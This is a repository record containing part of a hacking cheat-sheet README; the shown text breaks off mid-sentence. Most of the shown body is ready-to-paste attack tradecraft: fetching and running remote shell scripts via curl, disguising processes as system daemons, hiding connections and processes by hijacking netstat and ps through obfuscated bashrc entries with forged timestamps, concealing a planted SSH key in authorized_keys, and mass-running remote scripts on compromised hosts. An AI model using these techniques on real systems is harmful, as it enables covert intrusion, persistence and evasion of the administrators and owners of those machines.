{"id":13438034,"url":"https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet","last_synced_at":"2025-02-25T08:32:53.494Z","repository":{"id":37727309,"uuid":"235804364","full_name":"hackerschoice/thc-tips-tricks-hacks-cheat-sheet","owner":"hackerschoice","description":"Various tips \u0026 tricks","archived":false,"fork":false,"pushed_at":"2025-02-24T15:40:06.000Z","size":1108,"stargazers_count":3257,"open_issues_count":1,"forks_count":418,"subscribers_count":115,"default_branch":"master","last_synced_at":"2025-02-24T16:39:12.420Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hackerschoice.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-01-23T13:50:16.000Z","updated_at":"2025-02-24T15:40:13.000Z","dependencies_parsed_at":"2024-01-07T08:21:57.618Z","dependency_job_id":"c89dab11-2ba7-42a3-817e-48055c17009b","html_url":"https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet","commit_stats":{"total_commits":677,"total_committers":19,"mean_commits":35.63157894736842,"dds":0.2703101920236337,"last_synced_commit":"55269e6561d52d7ba2586d2dc6f93c740df95ca9"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/
hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hackerschoice%2Fthc-tips-tricks-hacks-cheat-sheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hackerschoice","download_url":"https://codeload.github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":240631729,"owners_count":19832334,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T03:01:02.389Z","updated_at":"2025-02-25T08:32:53.431Z","avatar_url":"https://github.com/hackerschoice.png","language":"Shell","funding_links":[],"categories":["C","General cheat sheets","Shell","others","🛠️ Developer Tools","Table of Contents","Learning Resources"],"sub_categories":["Books and Cheatsheets","Cheatsheets"],"readme":"\u003c!-- Use `grip 8080` to render the markdown locally --\u003e\n# THC's favourite Tips, Tricks \u0026 Hacks (Cheat Sheet)\n\nhttps://thc.org/tips  \n\nA collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.\n\nWe show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.\n\nGot tricks? Join us [https://thc.org/ops](https://thc.org/ops)\n\n1. [Bash](#bash)\n   1. [Set up a Hack Shell](#hackshell)\n   1. [Hide your commands](#bash-hide-command)\n   1. [Hide your command line options](#zap)\n   1. 
[Hide a network connection](#bash-hide-connection)\n   1. [Hide a process as user](#hide-a-process-user)\n   1. [Hide a process as root](#hide-a-process-root)\n   1. [Hide scripts](#hide-scripts)\n   1. [Hide from cat](#cat)\n   1. [Execute in parallel with separate logfiles](#parallel)\n1. [SSH](#ssh)\n   1. [Almost invisible SSH](#ssh-invisible)\n   1. [Multiple shells via 1 SSH/TCP connection](#ssh-master)\n   1. [SSH tunnel](#ssh-tunnel)\n   1. [SSH socks5 tunnel](#ssh-socks-tunnel)\n   1. [SSH to NATed host](#ssh-j)\n   1. [SSH pivot via ProxyJump](#ssh-pj)\n   1. [SSHD as user](#sshd-user)\n1. [Network](#network)\n   1. [Discover hosts](#discover)\n   1. [Tcpdump](#tcpdump)\n   1. [Tunnel and forwarding](#tunnel)\n      1. [Raw TCP reverse ports](#ports)\n      1. [HTTPS reverse forwards](#https)\n      2. [Bouncing traffic with iptables](#iptables)\n      3. [Ghost IP / IP Spoofing](#ghost)\n      4. [Various](#tunnel-more)\n   1. [Use any tool via Socks Proxy](#scan-proxy)\n   1. [Find your public IP address](#your-ip)\n   1. [Check reachability from around the world](#check-reachable)\n   1. [Check/Scan Open Ports](#check-open-ports)\n   1. [Crack Passwords hashes](#bruteforce)\n   1. [Brute Force Passwords / Keys](#bruteforce)\n1. [Data Upload/Download/Exfil](#exfil)\n   1. [File Encoding/Decoding](#file-encoding)\n   1. [File transfer using cut \u0026 paste](#cut-paste)\n   1. [File transfer using screen](#xfer-tmux)\n   1. [File transfer using screen](#file-transfer-screen)\n   1. [File transfer using gs-netcat and sftp](#file-transfer-gs-netcat)\n   1. [File transfer using HTTP](#http)\n   1. [File download without curl](#download)\n   2. [File transfer using rsync](#rsync)\n   1. [File transfer to public dump sites](#trans) \n   1. [File transfer using WebDAV](#webdav)\n   1. [File transfer to Telegram](#tg) \n1. [Reverse Shell / Dumb Shell](#reverse-shell)\n   1. [Reverse Shells](#reverse-shell)\n      1. 
[with gs-netcat (encrypted)](#reverse-shell-gs-netcat)\n      1. [with Bash](#reverse-shell-bash)\n      2. [with cURL (encrypted)](#curlshell)\n      2. [with cURL (cleartext)](#curltelnet)\n      3. [with OpenSSL (encrypted)](#sslshell)\n      1. [with remote.moe (encrypted)](#revese-shell-remote-moe)\n      1. [without /dev/tcp](#reverse-shell-no-bash)\n      2. [with sshx.io (encrypted)](#sshx)\n      1. [with Python](#reverse-shell-python)\n      1. [with Perl](#reverse-shell-perl)\n      1. [with PHP](#reverse-shell-php)\n   1. [Upgrading the dumb shell](#reverse-shell-upgrade)\n      1. [Upgrade a reverse shell to a pty shell](#reverse-shell-pty)\n      1. [Upgrade a reverse shell to a fully interactive shell](#reverse-shell-interactive)\n      1. [Reverse shell with socat (fully interactive)](#reverse-shell-socat)\n1. [Backdoors](#backdoor)\n   1. [Background reverse shell](#backdoor-background-reverse-shell)\n   1. [authorized_keys](#backdoor-auth-keys)\n   1. [Remote access an entire network](#backdoor-network)\n   1. [Smallest PHP backdoor](#php-backdoor)\n   1. [Smallest reverse DNS-tunnel backdoor](#reverse-dns-backdoor)\n   1. [Local Root backdoor](#ld-backdoor)\n   1. [Self-extracting implant](#implant)\n1. [Host Recon](#hostrecon)\n1. [Shell Hacks](#shell-hacks)\n   1. [Shred files (secure delete)](#shred)\n   1. [Restore the date of a file](#restore-timestamp)\n   1. [Clean logfile](#shell-clean-logs)\n   1. [Hide files from a User without root privileges](#shell-hide-files)\n   1. [Make a file immutable](#perm-files)\n   1. [Change user without sudo/su](#nosudo)\n   1. [Obfuscate and crypt payload](#payload)\n   1. [Deploying a backdoor without touching the file-system](#memexec)\n1. [Crypto](#crypto)\n   1. [Generate quick random Password](#gen-password)\n   1. [Linux transportable encrypted filesystems](#crypto-filesystem)\n      1. [cryptsetup](#crypto-filesystem)\n      1. [EncFS](#encfs)\n   1. [Encrypting a file](#encrypting-file)\n1. 
[Session sniffing and hijacking](#sniffing)\n   1. [Sniff a user's SHELL session](#session-sniffing)\n   2. [Sniff all SHELL sessions with dtrace](#dtrace)\n   2. [Sniff all SHELL sessions with eBPF](#bpf)\n   1. [Sniff a user's SSH or SSHD session with strace](#ssh-sniffing-strace)\n   1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper)\n   1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit)\n   1. [Hijack / Take-over a running SSH session](#hijack)\n1. [VPN and Shells](#vpn-shell)\n   1. [Disposable Root Servers](#shell)\n   1. [VPN/VPS Providers](#vpn)\n1. [OSINT Intelligence Gathering](#osint)\n1. [Miscellaneous](#misc)\n   1. [Tools of the trade](#tools)\n   1. [Cool Linux commands](#cool-linux-commands)\n   1. [tmux Cheat Sheet](#tmux)\n   1. [Useful commands](#useful-commands)\n1. [How to become a Hacker](#hacker)\n1. [Other Sites](#others)\n\n---\n\u003ca id=\"bash\"\u003e\u003c/a\u003e\n## 1. Bash / Shell\n\u003ca id=\"hackshell\"\u003e\u003c/a\u003e\n**1.i. Set up a Hack Shell (bash):**\n\nMake BASH less noisy. 
Disables *~/.bash_history* and [many other things](https://github.com/hackerschoice/hackshell).\n```sh\n source \u003c(curl -SsfL https://thc.org/hs)\n```\nAlternative URL:\n```sh\n source \u003c(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)\n```\n\nAnd if there is no curl/wget, use [surl](#download) and (temporarily) installed curl with `bin curl`.\n```sh\nsource \u003c(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)\n# Afterwards type `bin curl` to (temporarily) install curl (in memory).\n```\n\nHackShell does much more but most importantly this:\n```sh\nunset HISTFILE\n[ -n \"$BASH\" ] \u0026\u0026 export HISTFILE=\"/dev/null\"\nexport BASH_HISTORY=\"/dev/null\"\nexport LANG=en_US.UTF-8\nlocale -a 2\u003e/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US\nexport LESSHISTFILE=-\nexport REDISCLI_HISTFILE=/dev/null\nexport MYSQL_HISTFILE=/dev/null\nTMPDIR=\"/tmp\"\n[ -d \"/var/tmp\" ] \u0026\u0026 TMPDIR=\"/var/tmp\"\n[ -d \"/dev/shm\" ] \u0026\u0026 TMPDIR=\"/dev/shm\"\nexport TMPDIR\nexport PATH=\".:${PATH}\"\nif [[ \"$SHELL\" == *\"zsh\" ]]; then\n    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '\nelse\n    PS1='\\[\\033[36m\\]\\u\\[\\033[m\\]@\\[\\033[32m\\]\\h:\\[\\033[33;1m\\]\\w\\[\\033[m\\]\\$ '\nfi\nalias wget='wget --no-hsts'\nalias vi=\"vi -i NONE\"\nalias vim=\"vim -i NONE\"\nalias screen=\"screen -ln\"\n\nTERM=xterm reset -I\nstty cols 400 # paste this on its own before pasting the next line:\nresize \u0026\u003e/dev/null || { stty -echo;printf \"\\e[18t\"; read -t5 -rdt R;IFS=';' read -r -a a \u003c\u003c\u003c \"${R:-8;25;80}\";[ \"${a[1]}\" -ge \"${a[2]}\" ] \u0026\u0026 { R=\"${a[1]}\";a[1]=\"${a[2]}\";a[2]=\"${R}\";};stty sane rows \"${a[1]}\" cols \"${a[2]}\";}\n# stty sane rows 60 cols 160\n```\n\nBonus tip:\nAny command starting with a \" \" (space) will [not get logged to 
history](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) either.\n```\n$  id\n```\n\n\u003ca id=\"bash-hide-command\"\u003e\u003c/a\u003e\n**1.ii. Hide your command / Daemonize your command**\n\nThis will hide the *process name* only. Use [zapper](#zap) to also hide the command line options.\n\n```shell\n(exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'\n```\n\nStart a background 'nmap' hidden as '/usr/sbin/sshd':\n```\n(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 \u0026\u003enmap.log \u0026)\n```\n\nStart within a [GNU screen](https://linux.die.net/man/1/screen):\n```\nscreen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24\n### Attach back to the nmap process\nscreen -x MyName\n```\n\nAlternatively, copy the binary to a new name:\n```sh\ncd /dev/shm\ncp \"$(command -v nmap)\" syslogd\nPATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24\n```\n\nor use bind-mount to (temporarily) let */sbin/init* point to */dev/shm/nmap* instead:\n```shell\nmount -n --bind \"$(command -v nmap)\" /sbin/init\n# starting /sbin/init will instead execute nmap\n(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 \u0026\u003enmap.log \u0026)\n```\n\n\u003ca id=\"zap\"\u003e\u003c/a\u003e\n**1.iii. 
Hide your command line options**\n\nUse [zapper](https://github.com/hackerschoice/zapper):\n```sh\ncurl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) \u0026\u0026 \\\nchmod 755 zapper\n```\n\n```sh\n# Start Nmap but zap all options and show it as 'klog' in the process list:\n./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24\n# Started as a daemon and sshd-style name:\n(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 \u0026\u003enmap.log \u0026)\n# Replace the existing shell with tmux (with 'exec').\n# Then start and hide tmux and all further processes - as some kernel process:\nexec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux\n```\n\n\u003ca id=\"bash-hide-connection\"\u003e\u003c/a\u003e\n**1.iv. Hide a Network Connection**\n\nThe trick is to hijack `netstat` and use grep to filter out our connection. This example filters any connection on port 31337 _or_ ip 1.2.3.4. The same should be done for `ss` (a netstat alternative).\n\n**Method 1 - Hiding a connection with bash-function in ~/.bashrc**\n\nCut \u0026 paste this to add the line to ~/.bashrc\n```shell\necho 'netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }' \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\nOr cut \u0026 paste this for an obfuscated entry to ~/.bashrc:\n```shell\nX='netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }'\necho \"eval \\$(echo $(echo \"$X\" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG\" \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\nThe obfuscated entry to ~/.bashrc will look like this:\n```\neval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG\n```\n\n**Method 2 - Hiding a connection with a binary in $PATH**\n\nCreate a fake netstat binary in /usr/local/sbin. 
On a default Debian (and most Linux distributions) the PATH variable (`echo $PATH`) lists /usr/local/sbin _before_ /usr/bin. This means that our hijacking binary /usr/local/sbin/netstat will be executed instead of /usr/bin/netstat.\n\n```shell\necho -e \"#! /bin/bash\nexec /usr/bin/netstat \\\"\\$@\\\" | grep -Fv -e :22 -e 1.2.3.4\" \u003e/usr/local/sbin/netstat \\\n\u0026\u0026 chmod 755 /usr/local/sbin/netstat \\\n\u0026\u0026 touch -r /usr/bin/netstat /usr/local/sbin/netstat\n```\n\n*(thank you iamaskid)*\n\n\u003ca id=\"hide-a-process-user\"\u003e\u003c/a\u003e\n**1.v. Hide a process as user**\n\nContinuing from \"Hiding a connection\" the same technique can be used to hide a process. This example hides the nmap process and also takes care that our `grep` does not show up in the process list by renaming it to GREP:\n\n```shell\necho 'ps(){ command ps \"$@\" | exec -a GREP grep -Fv -e nmap  -e GREP; }' \u003e\u003e~/.bashrc \\\n\u0026\u0026 touch -r /etc/passwd ~/.bashrc\n```\n\n\u003ca id=\"hide-a-process-root\"\u003e\u003c/a\u003e\n**1.vi. 
Hide a process as root**\n\nThis requires root privileges and is an old Linux trick by over-mounting /proc/\u0026lt;pid\u0026gt; with a useless directory:\n```sh\nhide() {\n    [[ -L /etc/mtab ]] \u0026\u0026 { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }\n    _pid=${1:-$$}\n    [[ $_pid =~ ^[0-9]+$ ]] \u0026\u0026 { mount -n --bind /dev/shm /proc/$_pid \u0026\u0026 echo \"[THC] PID $_pid is now hidden\"; return; }\n    local _argstr\n    for _x in \"${@:2}\"; do _argstr+=\" '${_x//\\'/\\'\\\"\\'\\\"\\'}'\"; done\n    [[ $(bash -c \"ps -o stat= -p \\$\\$\") =~ \\+ ]] || exec bash -c \"mount -n --bind /dev/shm /proc/\\$\\$; exec \\\"$1\\\" $_argstr\"\n    bash -c \"mount -n --bind /dev/shm /proc/\\$\\$; exec \\\"$1\\\" $_argstr\"\n}\n```\n\nTo hide a command use:\n```sh\nhide                                 # Hides the current shell/PID\nhide 31337                           # Hides process with pid 31337\nhide sleep 1234                      # Hides 'sleep 1234'\nhide nohup sleep 1234 \u0026\u003e/dev/null \u0026  # Starts and hides 'sleep 1234' as a background process\n```\n\n(thanks to *druichi* for improving this)\n\n\u003ca id=\"hide-scripts\"\u003e\u003c/a\u003e\n**1.vii. Hide shell scripts**\n\nAbove we discussed how to obfuscate a line in ~/.bashrc. An often used trick is to use `source` instead. The source command can be shortened to `.` (yes, a dot) _and_ it also searches through the $PATH variable to find the file to load.\n\nIn this example our script ```prng``` contains all of our shell functions from above. Those functions hide the `nmap` process and the network connection. Last we add `. prng` into the systemwide rc file. This will load `prng` when the user (and root) logs in:\n\n```shell\necho -e 'netstat(){ command netstat \"$@\" | grep -Fv -e :31337 -e 1.2.3.4; }\nps(){ command ps \"$@\" | exec -a GREP grep -Fv -e nmap  -e GREP; }' \u003e/usr/bin/prng \\\n\u0026\u0026 echo \". 
prng #Initialize Pseudo Random Number Generator\" \u003e\u003e/etc/bash.bashrc \\\n\u0026\u0026 touch -r /etc/ld.so.conf /usr/bin/prng /etc/bash.bashrc\n```\n\n(The same works for `lsof`, `ss` and `ls`)\n\n\u003ca id=\"cat\"\u003e\u003c/a\u003e\n**1.viii. Hide from cat**\n\nANSI escape characters or a simple `\\r` ([carriage return](https://www.hahwul.com/2019/01/23/php-hidden-webshell-with-carriage/)) can be used to hide from `cat` and others.\n\nHide the last command (example: `id`) in `~/.bashrc`:\n```sh\necho -e \"id #\\\\033[2K\\\\033[1A\" \u003e\u003e~/.bashrc\n### The ANSI escape sequence \\\\033[2K erases the line. The next sequence \\\\033[1A\n### moves the cursor 1 line up.\n### The '#' after the command 'id' is a comment and is needed so that bash still\n### executes the 'id' but ignores the two ANSI escape sequences.\n```\nNote: We use `echo -e` to convert `\\\\033` to the ANSI escape character (hex 0x1b).\n\nAdding a `\\r` (carriage return) goes a long way to hide your ssh key from `cat`:\n```shell\necho \"ssh-ed25519 AAAAOurPublicKeyHere....blah x@y\"$'\\r'\"$(\u003cauthorized_keys)\" \u003eauthorized_keys\n### This adds our key as the first key and 'cat authorized_keys' won't show\n### it. The $'\\r' is a bash special to create a \\r (carriage return).\n```\n\n\u003ca id=\"parallel\"\u003e\u003c/a\u003e\n**1.ix. Execute in parallel with separate logfiles**\n\nScan 20 hosts in parallel and log each result to a separate log file:\n```sh\n# hosts.txt contains a long list of hostnames or ip-addresses\n# (Use -sCV for more verbose version)\ncat hosts.txt | parallel -j20 'exec nmap -n -Pn -sV -F --open -oG - {} \u003enmap_{}.txt'\n```\nNote: The example uses `exec` to replace the underlying shell with the last process (nmap, gsexec). 
It's optional but reduces the number of running shell binaries.\n\nExecute [Linpeas](https://github.com/carlospolop/PEASS-ng) on all [gsocket](https://www.gsocket.io/deploy) hosts using 40 workers:\n```sh\n# secrets.txt contains a long list of gsocket-secrets for each remote server.\ncat secrets.txt | parallel -j40 'mkdir host_{}; exec gsexec {} \"curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh\" \u003ehost_{}/linpeas.log 2\u003ehost_{}/linpeas.err'\n```\nNote: `xargs -P20 -I{}` is another good way but it cannot log each output into a separate file.  \n\n---\n\u003ca id=\"ssh\"\u003e\u003c/a\u003e\n## 2. SSH\n\u003ca id=\"ssh-invisible\"\u003e\u003c/a\u003e\n**2.i. Almost invisible SSH**\n\nStops you from showing up in *w* or *who* command and stops logging the host to *~/.ssh/known_hosts*.\n```sh\nssh -o UserKnownHostsFile=/dev/null -T user@server.org \"bash -i\"\n```\n\nGo full comfort with PTY and colors: `xssh user@server.org`:\n\n```sh\n### Cut \u0026 Paste the following to your shell, then execute\n### xssh user@server.org\nxssh() {\n    local ttyp=\"$(stty -g)\"\n    echo -e \"\\e[0;35mTHC says: pimp up your prompt: Cut \u0026 Paste the following into your remote shell:\\e[0;36m\"\n    echo -e '\\e[0;36msource \u003c(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)\\e[0m'\n    echo -e \"\\e[2m# or: \\e[0;36m\\e[2mPS1='\"'\\[\\\\033[36m\\]\\\\u\\[\\\\033[m\\]@\\[\\\\033[32m\\]\\\\h:\\[\\\\033[33;1m\\]\\\\w\\[\\\\033[m\\]\\\\$ '\"'\\e[0m\"\n    stty raw -echo icrnl opost\n    [[ $(ssh -V 2\u003e\u00261) == OpenSSH_[67]* ]] \u0026\u0026 a=\"no\"\n    ssh -oConnectTimeout=5 -oUserKnownHostsFile=/dev/null -oStrictHostKeyChecking=\"${a:-accept-new}\" -T \\\n        \"$@\" \\\n        \"unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=/dev/null TERM=xterm-256color HISTFILE=/dev/null BASH_HISTORY=/dev/null exec -a [uid] script -qc 'source \u003c(resize 2\u003e/dev/null); exec -a 
[uid] bash -i' /dev/null\"\n    stty \"${ttyp}\"\n}\n```\n\n\u003ca id=\"ssh-master\"\u003e\u003c/a\u003e\n**2.ii Multiple shells via 1 SSH/TCP connection**\n\nHave one TCP connection to the target and allow multiple users to piggyback on the same TCP connection to open further shell sessions.\n\nCreate a Master Connection:\n```sh\nssh -M -S .sshmux user@server.org\n```\n\nCreate further shell-sessions using the same (single) Master-TCP connection from above (no password/auth needed):\n```sh\nssh -S .sshmux NONE\n#ssh -S .sshmux NONE ls -al\n#scp -o \"ControlPath=.sshmux\" NONE:/etc/passwd .\n```\nCan be combined with [xssh](#ssh-invisible) to hide from utmp.\n\n\u003ca id=\"ssh-tunnel\"\u003e\u003c/a\u003e\n**2.iii SSH tunnel**\n\nWe use this all the time to circumvent local firewalls and IP filtering:\n```sh\nssh -g -L31337:1.2.3.4:80 user@server.org\n```\nYou or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\nClever hackers use the keyboard combination `~C` to dynamically create these tunnels without having to reconnect the SSH. (thanks MessedeDegod).\n\nWe use this to give access to a friend to an internal machine that is not on the public Internet:\n```sh\nssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org\n```\nAnyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\n\u003ca id=\"ssh-socks-tunnel\"\u003e\u003c/a\u003e\n**2.iv SSH socks4/5 tunnel**\n\nOpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server.\n\n```sh\nssh -D 1080 user@server.org\n```\nNow configure your browser to use SOCKS with 127.0.0.1:1080. 
All your traffic is now tunneled through *server.org* and will appear with the source IP of *server.org*. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\nThis is the reverse of the above example. It gives others access to your *local* network or lets others use your computer as a tunnel end-point.\n\n```sh\nssh -g -R 1080 user@server.org\n```\n\nThe others configure server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#backdoor-network).\n\n\u003ca id=\"ssh-j\"\u003e\u003c/a\u003e\n**2.v SSH to a host behind NAT**\n\n[ssh-j.com](http://ssh-j.com) provides a great relay service: To access a host behind NAT/Firewall (via SSH).\n\nOn the host behind NAT: Create a reverse SSH tunnel to [ssh-j.com](http://ssh-j.com) like so:\n```sh\n## Cut \u0026 Paste on the host behind NAT.\nsshj()\n{\n   local pw\n   pw=${1,,}\n   [[ -z $pw ]] \u0026\u0026 { pw=$(head -c64 \u003c/dev/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; }\n   echo \"Press Ctrl-C to stop this tunnel.\"\n   echo -e \"To ssh to ${USER:-root}@${2:-127.0.0.1}:${3:-22} type: \\e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\\e[0m\"\n   ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22}\n}\n\nsshj                                 # Generates a random tunnel ID [e.g. 
5dmxf27tl4kx] and keeps the tunnel connected\nsshj foobarblahblub                  # Creates tunnel to 127.0.0.1:22 with specific tunnel ID\nsshj foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1:2222 on the LAN\n```\n\nThen use this command from anywhere else in the world to connect as 'root' to 'foobarblahblub' (the host behind the NAT):\n```sh\nssh -J foobarblahblub@ssh-j.com root@foobarblahblub\n```\nThe ssh connection goes via ssh-j.com into the reverse tunnel to the host behind NAT. The traffic is end-2-end encrypted and ssh-j.com can not see the content.\n\n\n\u003ca id=\"ssh-pj\"\u003e\u003c/a\u003e\n**2.vi SSH pivoting to multiple servers**\n\nSSH ProxyJump can save you a lot of time and hassle when working with remote servers. Let's assume the scenario:  \n\nOur workstation is $local-kali and we like to SSH into $target-host. There is no direct connection between our workstation and $target-host. Our workstation can only reach $C2. $C2 can reach $internal-jumphost (via internal eth1) and $internal-jumphost can reach the final $target-host via eth2.\n```sh\n          $local-kali       -\u003e $C2            -\u003e $internal-jumphost    -\u003e $target-host\neth0      192.168.8.160      10.25.237.119             \neth1                         192.168.5.130       192.168.5.135\neth2                                             172.16.2.120             172.16.2.121\n```\n\n\u003e We do not execute `ssh` on any computer but our trusted workstation - and neither shall you (ever).\n\nThat's where ProxyJump helps: We can 'jump' via the two intermediary servers $C2 and $internal-jumphost (without spawning a shell on those servers). 
The ssh-connection is end-2-end encrypted between our $local-kali and $target-host and no password or key is exposed to $C2 or $internal-jumphost.\n\n```sh \n## if we want to SSH to $target-host:\nkali@local-kali$ ssh -J c2@10.25.237.119,jumpuser@192.168.5.135 target@172.16.2.121\n\n## if we want to SSH to just $internal-jumphost:\nkali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135\n```\n\n\u003e We use this as well to hide our IP address when logging into servers. \n\n\u003ca id=\"sshd-user\"\u003e\u003c/a\u003e\n**2.vii SSHD as user land**\n\nIt is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing) or as a quick exfil-dump-server that runs as non-root:\n```sh\n# On the server, as non-root user 'joe':\nmkdir -p ~/.ssh 2\u003e/dev/null\nssh-keygen -q -N \"\" -t ed25519 -f sshd_key\ncat sshd_key.pub \u003e\u003e~/.ssh/authorized_keys\ncat sshd_key\n$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv\n```\n```sh\n# On the client, copy the sshd_key from the server. Then login:\n# Example: Proxy connection via the server and reverse-forward 31339 to localhost:\nssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4\n# curl -x socks5h://0 ipinfo.io\n```\n\n[SSF](https://securesocketfunneling.github.io/ssf/#home) is an alternative way to multiplex TCP over TLS.\n\n---\n\u003ca id=\"network\"\u003e\u003c/a\u003e\n## 3. Network\n\u003ca id=\"discover\"\u003e\u003c/a\u003e\n**3.i. 
Discover hosts**\n\n```sh\n## ARP discover computers on the _LOCAL_ network only\nnmap -n -sn -PR -oG - 192.168.0.1/24\n```\n\n```sh\n### ICMP discover hosts\nnmap -n -sn -PI -oG - 192.168.0.1/24\n```\n\n```sh\n## ICMP discover hosts (local LAN) ROOT\n# NET=\"10.11.0\"  # discover 10.11.0.1-10.11.0.254\nseq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 \"${NET:-192.168.0}.{}\" | grep 'bytes from' | awk '{print $4\" \"$7;}' | sort -uV -k1,1\n```\n\n---\n\u003ca id=\"tcpdump\"\u003e\u003c/a\u003e\n**3.ii. tcpdump**\n\n```sh\n## Monitor every new TCP connection\ntcpdump -np 'tcp[tcpflags] ^ (tcp-syn|tcp-ack) == 0'\n\n## Play a *bing*-noise for every new SSH connection\ntcpdump -nplq 'tcp[13] == 2 and dst port 22' | while read -r x; do echo \"${x}\"; echo -en \\\\a; done\n\n## Ascii output (for all large packets. Change to \u003e40 if no TCP options are used).\ntcpdump -npAq -s0 'tcp and (ip[2:2] \u003e 60)'\n```\n\n---\n\u003ca id=\"tunnel\"\u003e\u003c/a\u003e\n**3.iii. Tunnel and forwarding**\n\n```sh\n## Connect to SSL (using socat)\nsocat stdio openssl-connect:smtp.gmail.com:465\n\n## Connect to SSL (using openssl)\nopenssl s_client -connect smtp.gmail.com:465\n```\n\n```sh\n## Bridge TCP to SSL\nsocat TCP-LISTEN:25,reuseaddr,fork  openssl-connect:smtp.gmail.com:465\n```\n\n---\n\u003ca id=\"ports\"\u003e\u003c/a\u003e\n**3.iii.a Raw TCP reverse ports**\n\nUseful for reverse backdoors that need a TCP Port on a PUBLIC IP Address:\n\nUsing [segfault.net](https://thc.org/segfault.net) (free):\n```sh\n# Request a random public TCP port:\ncurl sf/port\necho \"Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)\"\nnc -vnlp $(cat /config/self/reverse_port)\n```\n\nUsing 